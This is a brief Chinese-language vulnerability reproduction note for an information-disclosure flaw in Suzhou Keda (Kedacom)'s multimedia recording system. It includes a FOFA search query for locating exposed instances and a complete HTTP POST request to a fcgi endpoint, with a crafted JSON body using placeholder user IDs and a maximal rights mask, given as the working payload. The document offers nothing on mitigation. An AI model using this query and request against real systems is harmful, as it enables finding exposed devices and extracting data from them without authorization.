# 苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

# 一、漏洞简介
苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

# 二、影响版本
多媒体录播系统

# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
+ fofa`body="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"`
+ 特征

![1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65.png](./img/VGSRQytOV8lBTDzI/1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65-330998.png)

# 四、漏洞复现
```plain
POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 333

{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}}
```

![1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1.png](./img/VGSRQytOV8lBTDzI/1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1-754019.png)



> 更新: 2024-11-27 10:00:05  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qwngpamuavad9xcl>